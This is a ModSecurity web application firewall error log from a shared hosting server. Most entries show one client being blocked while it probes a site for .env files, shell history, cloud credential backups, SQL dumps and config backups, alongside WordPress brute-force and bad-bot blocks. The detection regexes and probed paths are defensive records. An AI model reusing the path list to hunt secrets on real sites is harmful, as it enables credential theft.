[Tue May 26 19:51:58.918817 2026] [security2:error] [pid 86490:tid 86700] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fIlEs/.EnV"] [unique_id "ahWshlZMwN0DpLVWo6KbGwAAANU"]
[Tue May 26 19:51:59.390195 2026] [security2:error] [pid 86490:tid 86650] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fastapi-app/api/.env"] [unique_id "ahWsh1ZMwN0DpLVWo6KbMAAAAKM"]
[Tue May 26 19:51:59.547755 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/backup/log.sql"] [unique_id "ahWsh1ZMwN0DpLVWo6KbOAAAALw"]
[Tue May 26 19:51:59.858021 2026] [security2:error] [pid 86490:tid 86685] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsh1ZMwN0DpLVWo6KbMwAAAMY"]
[Tue May 26 19:52:00.196731 2026] [security2:error] [pid 86490:tid 86610] [remote 92.205.188.156:40742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsiFZMwN0DpLVWo6KbRQAA9nc"]
[Tue May 26 19:52:00.333194 2026] [security2:error] [pid 86490:tid 86647] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/payload/.env"] [unique_id "ahWsiFZMwN0DpLVWo6KbTgAAAKA"]
[Tue May 26 19:52:00.962943 2026] [security2:error] [pid 86490:tid 86628] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node-app/backend/.env"] [unique_id "ahWsiFZMwN0DpLVWo6KbVgAAAI0"]
[Tue May 26 19:52:01.725882 2026] [security2:error] [pid 86490:tid 86611] [remote 92.205.188.156:40742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsiVZMwN0DpLVWo6KbcAAA43g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:52:02.066519 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/workspace/.env"] [unique_id "ahWsilZMwN0DpLVWo6KbgAAAAMo"]
[Tue May 26 19:52:02.371451 2026] [security2:error] [pid 86490:tid 86631] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsiVZMwN0DpLVWo6KbdwAAAJA"]
[Tue May 26 19:52:02.535273 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cpanel/.env"] [unique_id "ahWsilZMwN0DpLVWo6KbkAAAALo"]
[Tue May 26 19:52:02.932462 2026] [security2:error] [pid 86490:tid 86716] [client 85.208.96.210:43372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/day/2023-05-22/"] [unique_id "ahWsilZMwN0DpLVWo6KbmQAAAOU"]
[Tue May 26 19:52:02.932642 2026] [security2:error] [pid 86490:tid 86716] [client 85.208.96.210:43372] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/day/2023-05-22/"] [unique_id "ahWsilZMwN0DpLVWo6KbmQAAAOU"]
[Tue May 26 19:52:03.634453 2026] [security2:error] [pid 86490:tid 86676] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/webpack.config.mjs.bak"] [unique_id "ahWsi1ZMwN0DpLVWo6KbsQAAAL0"]
[Tue May 26 19:52:04.281249 2026] [security2:error] [pid 86490:tid 86621] [client 74.7.228.21:60344] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.emlak.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWsjFZMwN0DpLVWo6KbzgAAhgU"]
[Tue May 26 19:52:04.419863 2026] [security2:error] [pid 86490:tid 86733] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.aws/credentials.copy"] [unique_id "ahWsjFZMwN0DpLVWo6Kb0gAAAPY"]
[Tue May 26 19:52:04.740080 2026] [security2:error] [pid 86490:tid 86624] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.bak.backup"] [unique_id "ahWsjFZMwN0DpLVWo6Kb4QAAAIk"]
[Tue May 26 19:52:04.933583 2026] [security2:error] [pid 86490:tid 86687] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsjFZMwN0DpLVWo6Kb2QAAAMg"]
[Tue May 26 19:52:05.369930 2026] [security2:error] [pid 86490:tid 86644] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/python/.env"] [unique_id "ahWsjVZMwN0DpLVWo6Kb9wAAAJ0"]
[Tue May 26 19:52:05.676224 2026] [security2:error] [pid 86490:tid 86502] [remote 162.241.152.21:46530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsjVZMwN0DpLVWo6Kb-AAA3Qs"]
[Tue May 26 19:52:05.999160 2026] [security2:error] [pid 86490:tid 86646] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/login.sql"] [unique_id "ahWsjVZMwN0DpLVWo6KcCAAAAJ8"]
[Tue May 26 19:52:06.154033 2026] [security2:error] [pid 86490:tid 86728] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/letsencrypt/.env"] [unique_id "ahWsjlZMwN0DpLVWo6KcFAAAAPE"]
[Tue May 26 19:52:06.467534 2026] [security2:error] [pid 86490:tid 86725] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/reset.php.old"] [unique_id "ahWsjlZMwN0DpLVWo6KcFwAAAO4"]
[Tue May 26 19:52:06.936274 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/social-app/backend/.env"] [unique_id "ahWsjlZMwN0DpLVWo6KcKgAAAMw"]
[Tue May 26 19:52:07.179769 2026] [security2:error] [pid 86490:tid 86505] [remote 162.241.152.21:46530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsj1ZMwN0DpLVWo6KcLAABAg4"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:52:07.251857 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/login.php.old"] [unique_id "ahWsj1ZMwN0DpLVWo6KcOwAAAL4"]
[Tue May 26 19:52:07.636611 2026] [security2:error] [pid 86490:tid 86738] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsj1ZMwN0DpLVWo6KcNwAAAPs"]
[Tue May 26 19:52:07.954476 2026] [security2:error] [pid 86490:tid 86747] [client 189.192.137.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsj1ZMwN0DpLVWo6KcRAAAAQQ"]
[Tue May 26 19:52:08.352503 2026] [security2:error] [pid 86490:tid 86716] [client 185.177.72.53:29324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel/core/.env"] [unique_id "ahWskFZMwN0DpLVWo6KcYgAAAOU"]
[Tue May 26 19:52:09.481233 2026] [security2:error] [pid 86490:tid 86652] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/fuel/.env"] [unique_id "ahWskVZMwN0DpLVWo6KcgQAAAKU"]
[Tue May 26 19:52:09.802680 2026] [security2:error] [pid 86490:tid 86625] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/project/.env"] [unique_id "ahWskVZMwN0DpLVWo6KchwAAAIo"]
[Tue May 26 19:52:10.368930 2026] [security2:error] [pid 86490:tid 86631] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWskVZMwN0DpLVWo6KclgAAAJA"]
[Tue May 26 19:52:10.776128 2026] [security2:error] [pid 86490:tid 86665] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/config/default.bak"] [unique_id "ahWsklZMwN0DpLVWo6KcqAAAALI"]
[Tue May 26 19:52:10.936138 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hrm-app/api/.env"] [unique_id "ahWsklZMwN0DpLVWo6Kc1QAAAKk"]
[Tue May 26 19:52:11.421061 2026] [security2:error] [pid 86490:tid 86661] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/exec/.env"] [unique_id "ahWsk1ZMwN0DpLVWo6Kc3gAAAK4"]
[Tue May 26 19:52:11.581707 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/webpack.config.ts.bak"] [unique_id "ahWsk1ZMwN0DpLVWo6Kc6AAAAJc"]
[Tue May 26 19:52:11.904340 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/password.php.old"] [unique_id "ahWsk1ZMwN0DpLVWo6Kc-AAAAMg"]
[Tue May 26 19:52:12.065361 2026] [security2:error] [pid 86490:tid 86714] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.config/app.config.orig"] [unique_id "ahWslFZMwN0DpLVWo6KdAAAAAOM"]
[Tue May 26 19:52:12.549039 2026] [security2:error] [pid 86490:tid 86707] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/main.sql"] [unique_id "ahWslFZMwN0DpLVWo6KdDAAAANw"]
[Tue May 26 19:52:13.033253 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/orientdb-client/.env"] [unique_id "ahWslVZMwN0DpLVWo6KdIgAAANY"]
[Tue May 26 19:52:13.193798 2026] [security2:error] [pid 86490:tid 86650] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.bash_history"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.bash_history"] [unique_id "ahWslVZMwN0DpLVWo6KdIwAAAKM"]
[Tue May 26 19:52:13.356101 2026] [security2:error] [pid 86490:tid 86654] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWslFZMwN0DpLVWo6KdHQAAAKc"]
[Tue May 26 19:52:13.677444 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/portainer/.env"] [unique_id "ahWslVZMwN0DpLVWo6KdMgAAAPA"]
[Tue May 26 19:52:14.325380 2026] [security2:error] [pid 86490:tid 86649] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.cpanel/caches/config/.env"] [unique_id "ahWsllZMwN0DpLVWo6KdSAAAAKI"]
[Tue May 26 19:52:14.487776 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/azure-credentials.bak"] [unique_id "ahWsllZMwN0DpLVWo6KdSQAAAKY"]
[Tue May 26 19:52:14.648846 2026] [security2:error] [pid 86490:tid 86626] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.yml.orig"] [unique_id "ahWsllZMwN0DpLVWo6KdUAAAAIs"]
